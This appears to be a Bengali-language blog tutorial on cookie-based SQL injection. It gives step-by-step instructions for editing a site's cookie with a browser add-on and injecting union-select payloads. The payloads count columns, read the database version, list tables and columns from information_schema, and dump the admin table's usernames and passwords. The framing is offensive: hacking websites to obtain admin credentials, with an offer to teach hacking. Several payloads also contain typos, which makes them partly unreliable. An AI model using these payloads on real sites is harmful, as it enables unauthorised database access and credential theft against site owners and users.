ওয়েব সাইট হ্যাকিংঃ Cookie Based SQLi


সবাইকে স্বাগতম Cookie Based SQLi টিউটোরিয়ালে
প্রথমেই আপনার বেসিক SQLi সম্পর্কে ধারনা থাকতে হবে।
নিচের লিঙ্কটি থেকে পড়ে নিন!

Web Site Hacking : Sql Injection (Union Based)

তাহলেই বুঝতে পারবেন ।
(বিঃদ্রঃ SQLi এক এক সময় এক এক ধরনের হয়, আপনি এক পদ্ধতিতে সফল না হলে আরেক পদ্ধতি অনুসরন
করতে হবে এমন কোনো কথা নেই যে নির্দিষ্ট একটি ওয়েবসাইটে নির্দিষ্ট একটি মেথড কাজ করবে)
প্রথমে হ্যাকবার অন করে নিন অথবা না থাকলে গুগল করুন "Hackbar Addon" এই লেখাটি দিয়ে গুগলে
এরপরে "Cookie Manager" এই নামে একটা এডঅন আছে এটাও এড করে নিন!
Cookie Manager:
https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
এরপর আমাদের কাজ শুরু ।
মনে করুন আপনি যে সাইটটি পেলেন সেটার
url: http://site.com/cid.php?id=3
এখন আমাদের কাজ হবে ?id=3 এই লেখা টি কেটে দিয়ে
শুধুমাত্র cid.php এই লেখাটি থাকবে Url এ ...
এবার এন্টার দিন ।।
এখন আমাদের Url টি হচ্ছে
http://site.com/cid.php
প্রথমেই মোজিলা ব্রাউজারের টুলসে গিয়ে Cookie Manager অন করে নিন।
এবার নিচের স্ক্রিনশট টি দেখুন।
http://prntscr.com/4jtmn9
এডিটে ক্লিক করার পরে
নিচের স্ক্রিনশটটি লক্ষ্য করুনঃ
http://prntscr.com/4jtnav
এভাবে করার পর রিফ্রেশ দিলে পেইজটা তে এরর দেখাবে :)
এখন আশা করি বুঝতে পেরেছেন কমান্ড কিভাবে এক্সিকিউট করতে হবে ।
এরর দেখার পর আমাদের প্রথম কাজ হবে সাইটটিতে কয়টা কলাম আছে সেটা বের করা।
এর জন্যে আবার Cookie Manager এ গিয়ে প্রথম স্ক্রিন শট টির মতো সিলেক্ট করে এডিটে ক্লিক করুন।
এডিটে ক্লিক করলে ২য় স্ক্রিন শটটির মতো আসবে এখন কনটেন্ট এর জায়গায় লেখুন
3 order by 1-- এবার সেভ লেখায় ক্লিক করে পেইজটি রিলোড দিন কোনো এরর দেখাচ্ছে না আমার ক্ষেত্রে!
যায় হোক এভাবে বেসিক SQLi এ যেভাবে করতেন সেভাবে order by এর পরে সংখ্যা বাড়াইতে থাকুন ।
তবে কুকি ম্যানেজার দিয়ে !
যেটা আমি গত দুইটি স্টেপে দেখিয়েছি।
যায় হোক আমি বার বার কিভাবে কমান্ড এক্সিকিউট করতে হয় তা বলবো না কারণ তাহলে টিউটোরিয়ালটি অনেক বড়
হয়ে যাবে ।
এবার আমি order by 3-- পর্যন্ত যাওয়ার পর এরর দেখতে পেলাম !
যার মানে হচ্ছে এই সাইটে কলাম ২টি এখন ভুলনরাবল কলাম বের করার জন্যে কমান্ড দিলাম।
union select and 0+1,2-- এখন আমাকে ভুলনরাবল কলাম দেখাবে ।
এখানে একটি নতুন বিষট লক্ষ্য করুন and 0 অনেক সময় শুধু union select দিলেই রেসাল্ট দেখায় না ।
সে ক্ষেত্রে এই কমান্ডটি ব্যাবহার করতে পারেন ।
এই সকল কাজ করবেন কুকি ম্যানেজার দিয়ে :D ব্রাউজারে কমান্ড দিলে কোনো কাজই হবে না।
আবার বলছি বেসিক SQLi ভালোভাবে না শিখলে এটা আপনারা পারবেন না ।
যায় হোক আমি পেলামঃ১ তার মানি আমার টার্গেট করা সাইটের ভুলনরাবল কলাম হচ্ছে ১ ।
এখন আমি এই কলাম দিয়ে আমার কাঙ্খিত ডাটা ডাম্প করবো প্রথমেই ভার্সন বের করে ।
আবার কুকি ম্যানেজার অন করে আপনার টার্গেট সাইট টি সিলেক্ট করে এডিটে ক্লিক করুন
এবং কনটেন্ট এর জায়গায় কমান্ডটি হবে এরকম
3 union select and 0+version(),2--
এবার সেভ দিয়ে রিফ্রেশ করুন । রেসাল্ট দেখতে পাবেন ।
যায় হোক । আমার টার ভার্সন ৫ সুতারাং সহজেই SQLi করতে পারবো ।।
এবার কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে কমান্ড লেখলাম ।
3 union select and 0+group_concat(table_name),2+from+information_schama.tables+where+table_schema=database()
সেভ এ ক্লিক করে পেইজ রিফ্রেশ করলাম! আমি টেবিলস এর নাম গুলো দেখতে পাচ্ছিঃ
admin
news
about
এই ধরনের ।। এখন আমার কাজ হবে admin টেবিল নিয়ে সুতারাং
এবার কমান্ড দিবো ।
কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে
3 union select and 0+group_concat(columnn_name),2+from+information_schama.columns+where+table_name=Hex value Of Admin
এখন আমরা কলামস দেখতে পেলাম ।
login_user
login_password
এখন আমরা যদি এই কলাম গুলো দেখে ডাটা ডাম্প করতে চায় তাহলে আবার
কুকি ম্যানেজার--আপনার টার্গেট সাইট সিলেক্ট-এডিট--কনটেন্ট এ গিয়ে কমান্ড লেখুন
3 union select and 0+group_concat(login_user,0x3a,login_password),2+from+admin--
সেভ করে পেইজ টি রিফ্রেশ করুন  8-)   কাজ শেষ :) এডমিন আইডি এবং পাসওয়ার্ড দেখতে পাবেন !
হ্যাকিং শেখার আগ্রহ অনেকেই দেখান। শিখতে চায়লে আমার ফেইসবুক আইডিতে যোগাযোগ করতে পারেনঃ

ফেইসবুকে আমি


































































Previous
Next Post »

পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon

Thanks for your comment